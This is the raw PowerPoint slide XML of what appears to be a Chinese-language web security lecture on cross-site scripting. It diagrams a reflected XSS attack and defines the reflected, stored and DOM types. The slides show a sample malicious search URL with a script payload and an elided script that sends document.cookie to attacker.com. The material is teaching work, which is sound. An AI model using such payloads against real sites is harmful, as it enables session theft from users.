                  <a:srgbClr val="FF000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9536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9536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9536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9536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9536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95363">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20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2247900"/>
            <a:ext cx="6875463" cy="4076700"/>
            <a:chOff x="762000" y="2247900"/>
            <a:chExt cx="6875463" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15381" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4381500" y="2247900"/>
              <a:ext cx="3255963" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4667250"/>
            <a:ext cx="5334000" cy="1962150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  window.open(http://attacker.com? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ... document.cookie ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="1436688" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15366" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7170738" y="4446588"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15367" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="609600"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="228600"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6773863" y="4019550"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15370" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1069975"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2971800"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害客户端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2370281" y="982633"/>
            <a:ext cx="2236510" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户获取恶意链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15373" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2743200"/>
            <a:ext cx="4572000" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="2986088"/>
            <a:ext cx="2570163" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户点击链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2337946" y="3335867"/>
            <a:ext cx="3000375" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>响应用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15376" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3105150"/>
            <a:ext cx="5021263" cy="1619250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1944688"/>
            <a:ext cx="4457700" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="25000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> term = &lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4362450"/>
            <a:ext cx="5334000" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1639888"/>
            <a:ext cx="4457700" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.attacker.com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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7924800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>当攻击者可以向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用产生的页面注入脚本代码时，就出现了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入恶意代码的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>XSS (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>攻击脚本作为受害站点页面的一部分反射给用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>XSS (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>攻击者将攻击脚本存储在由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>应用程序管理的资源中，如数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DOM XSS</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Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
